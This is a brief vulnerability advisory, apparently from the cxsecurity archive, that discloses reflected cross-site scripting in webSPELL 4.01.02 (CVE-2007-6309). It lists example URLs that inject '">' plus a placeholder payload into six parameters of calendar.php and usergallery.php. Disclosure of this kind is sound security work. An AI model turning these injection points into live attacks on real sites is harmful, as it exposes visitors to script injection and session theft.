Bug: webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability (WLB-2007120021 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
 Credit: Brainhead
 Date: 2007.12.11
 CWE: CWE-79 (Show similar)
 CVE: CVE-2007-6309 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Low
No
Yes

###################

Autor: Brainhead

Type: XSS

Version: 4.01.02

Files: usergallery.php, calendar.php

Magic Quotes :off

###################

Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryI
D=">[your code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[y
our code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[yo
ur code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[
your code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">
[your code]

http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[y
our code]

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com